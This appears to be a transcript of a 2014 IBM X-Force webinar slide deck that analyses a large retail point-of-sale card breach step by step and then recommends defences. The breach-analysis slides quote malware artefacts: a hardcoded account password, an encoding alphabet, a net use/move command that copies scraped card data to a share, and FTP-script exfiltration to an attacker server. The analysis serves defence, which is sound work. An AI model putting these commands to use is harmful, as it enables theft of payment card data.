anatomy of an advanced retail breach
Post on 14-Sep-2014
4.214 views
DESCRIPTION
The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks. View the full on-demand webcast: https://www2.gotomeeting.com/register/537536362TRANSCRIPT
© 2012 IBM Corporation
IBM Security Systems
1© 2014 IBM Corporation
Anatomy of an Advanced Retail Breach
Chris PoulinResearch Strategist, X-Force
February 2014
© 2014 IBM Corporation
IBM Security Systems
2
Agenda
About the IBM X-Force
Dissection of a retail attack and data breach
Solutions to prevent similar compromises
Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.
© 2014 IBM Corporation
IBM Security Systems
3
X-Force is the foundation for advanced security and threat research across the IBM Security Framework
The mission of X-Force is to:
Monitor and evaluate the rapidly changing threat landscape
Research new attack techniques and develop protection for tomorrow’s security challenges
Educate our customers and the general public
© 2014 IBM Corporation
IBM Security Systems
4
Collaborative IBM teams monitor and analyze the changing threat landscape
Coverage
20,000+ devices under contract
3,700+ managed clients worldwide
15B+ events managed per day
133 monitored countries (MSS)
1,000+ security related patents
Depth
17B analyzed web pages & images
40M spam & phishing attacks
73K documented vulnerabilities
Billions of intrusion attempts daily
Millions of unique malware samples
© 2014 IBM Corporation
IBM Security Systems
5
Anatomy of the Breach
Attacker phishes a 3rd party contractor
Attacker finds & infects POS systems
w/malware
Malware scrapes RAM for clear text CC stripe data
Malware sends CC data to internal server; sends
custom ping to notify
Attacker finds & infects internal
Windows file server
Stolen data is exfiltrated to FTP
servers
Contractor portals
Retailer POS systems
Retailer Windows file server
Firewall
1
3a
4
5
6
Attacker uses stolen credentials
to access contractor portals
2
Attacker FTP servers (external/Russia)
3b
internal network
© 2014 IBM Corporation
IBM Security Systems
6
1. Phish a 3rd Party Contractor
HVAC firm in PA
Email malware campaign
Citadel password stealing bot, variant of Zeus banking trojan
Primary method of malware detection free version of Malwarebytes Anti-Malware
On-demand scanning; not for commercial use
Supplier portal contains lots of public information
– Example: list of resources for HVAC companies
Attacker phishes a 3rd party contractor
1
© 2014 IBM Corporation
IBM Security Systems
7
2. Access & exploit contractor portal
Contractor portal
Attacker uses stolen credentials
to access contractor portal
2
pdzone.retailer.com, 61.225.130.104, NS @ retailer.com
amlogin.ewips.partnersonline.com
161.225.202.98, NS @ retailer.com
Contractors generally not required to use token or other 2-factor authentication
service.ariba.com
216.109.104.11
NS @ ariba.com
© 2014 IBM Corporation
IBM Security Systems
8
3a. Discover & exploit internal file server
Exact method of movement from portal to internal server unknown
Probably not HVAC partner—cloud-based, not on retailer extranet
Back-end connect from partner portal or other retailer owned asset?
SQL injection, browser exploit, open ingress port, who knows?
Or maybe contractors had access to internal network to monitor HVAC systems remotely
Attacker finds & infects internal
Windows file server
Retailer Windows file server
3a
© 2014 IBM Corporation
IBM Security Systems
9
3a. Discover & exploit internal file server (cont’d)
Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
– Created by username John.Doe– Printed recently on Windows \\DOMAIN\
Google search easily reveals location of retail datacenters:
Malware to accumulate stolen card data and exfiltrate regularly(may have been 2 separate servers)
– Username=“Best1_user”; password=“BackupU$r”
– Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC
– Installed as “BladeLogic”, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component “bladelogic.exe”
– System / Administrator level account; can run batch jobs
Attacker finds & infects internal
Windows file server
Retailer Windows file server
3a
© 2014 IBM Corporation
IBM Security Systems
10
3b. Find & infect POS systems
Attacker finds & infects POS systems
w/malware
Retailer POS systems
Retailer Windows file server
3b
With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns
Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/
© 2014 IBM Corporation
IBM Security Systems
11
4. Malware scrapes card data from RAM
Trojan.POSRAM, variant of BlackPOS
No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure
Looks for “pos.exe” process
Installs trojan, creates registry entries containing string “POSWDS”
Scrape RAM for track 1 and track 2 data of financial cards
Card track data is encrypted
– Between the reader and POS, and
– again between the POS and payment processor
Unencrypted momentarily at the POS as the transaction is cleared
Debit card PINs are hashed at the card reader
Chip-and-PIN encrypts the transaction from the card to processor
Stores stolen card data in file %SystemRoot%\system32\winxml.dll
Malware scrapes RAM for clear text CC stripe data
Retailer POS systems
4
© 2014 IBM Corporation
IBM Security Systems
12
5. Harvested card data is sent to internal rally point
Moves stolen card data to a central collection point
Assumes POS systems have no internet access
Creates temp Windows share on domain
Malware on rally point creates share in %windir%\twain_32
Encodes base64, with encoding string
JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
Moves winxml.dll to \\<RallyPoint>_<Day>_<Mon>_<Hr>.txt
POS malware sends custom ICMP to as semaphore
Malware sends CC data to internal server; sends
custom ping to notify
Retailer POS systems
Retailer Windows file server
5
net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$rmove %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt”net use S: /del
© 2014 IBM Corporation
IBM Security Systems
13
6. Card data is exfiltrated to FTP servers in Russia
Compiles all card dumps into c:\windows\twain_32a.dll
Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
Generates an FTP script and executes ftp –s <path>\\cmd.txt
Stolen data is exfiltrated to FTP
servers
Retailer Windows file server6
Attacker FTP servers (external/Russia)
© 2014 IBM Corporation
IBM Security Systems
14
Protect endpoints
The ultimate prize:
– POS systems: where the card data is processed
– File servers: base of operations
– Web servers: initial incursion vector
– Contractor workstations: intelligence, credentials
Malware protection:
– Contractor workstations (phishing, Citadel bot)
– POS systems: RAM scraper trojan
– File servers: data management and exfiltration tools
– Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping
Patch
Configuration management
© 2014 IBM Corporation
IBM Security Systems
15
Protection against web and file server compromises
Secure development lifecycle (SDLC)
– Secure coding practices training
– Static/source code analysis—manual (code review) and automated
– Dynamic code analysis (esp low hanging fruit: SQL injection & XSS)
– Include compiled application, web applications, mobile apps
Go-live security process
– Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)
– Install appropriate endpoint protection and configuration management
– Vulnerability scan
Appropriate authentication
– Separate domains / administrative credentials (identity separation)
– Multi-factor authentication
© 2014 IBM Corporation
IBM Security Systems
16
Enumerate & classify
Restrict web assets’ access to internal systems
Isolate public / partner facing assets from private assets
Segment operational technology (OT), critical assets, and general IT
Perform firewall rule analysis, paying special attention to:
– assets containing sensitive data, such as cardholder information
– risky protocols and flow directions
For example, POS systems shouldn’t
– mount Windows shares, or
– send regular ICMP packets
Segment critical assets
Image source: http://nationalgeographic.com
© 2014 IBM Corporation
IBM Security Systems
17
Monitor & detect: network
Network activity pattern monitoring can detect:
– Suspicious scanning activity as attacker maps out the network landscape
– Policy violations for outbound FTP, especially to Eastern Bloc countries
Network packet inspection can detect:
– IPS can stop SQL injection, XSS, other more advanced attacks– Credit card number patterns in outbound data– Suspect strings in ICMP packets– Identify network traffic that is not what it seems: e.g.,
• Non-DNS protocol over port 53• IRC over port 80
© 2014 IBM Corporation
IBM Security Systems
18
Monitor & detect: vulnerability and anomaly detection Vulnerability scanning, including deep endpoint assessment
– example: registry entries containing “POSWDS”
Anomaly detection
– Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)
– Detect deviations from baseline:
• POS connecting to Windows shares
• POS emitting ICMP packets
– General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP– Profile ICMP packet sizes, normal payload contents; identify & block deviations
© 2014 IBM Corporation
IBM Security Systems
19
Incident Response
Speedy and complete forensics– early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical:
• Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information?
Instrument everything feasible,– include POS systems and network activity– Enrich with context from
• vulnerability assessment tools• change management transactions• security intelligence feeds.
© 2014 IBM Corporation
IBM Security Systems
20
Incident / emergency response
Plan should include– Detection– Response and escalation– Engaging law enforcement
as appropriate– Preservation of evidence– Compliance with regulations
and contractual agreements– Customer and press notification– Public relations.
Engage your contracted external emergency response agency in advance– Help you prepare for a breach and– Gather context about your environment.
Test your process regularly
Business associate contract and assessment
© 2014 IBM Corporation
IBM Security Systems
21
At IBM, the world is our security lab
v13-016,000IBM researchers, developers,
and subject matter expertsALL focused on security
3,000 IBM securitypatents
More than
Security Operations Centers
Security Research and Development Labs
Institute for Advanced Security Branches
© 2014 IBM Corporation22 IBM Security
Get Engaged with IBM X-Force Research and Development
Follow us at @ibmsecurity and @ibmxforce
Subscribe to X-Force alerts at iss.net/rss.phpor IBM Security blog at www.securityintelligence.com
Download X-Force security trend & risk reportshttp://www.ibm.com/security/xforce/
© 2014 IBM Corporation
IBM Security Systems
23
www.ibm.com/security
© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
www.ibm.com/security
© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.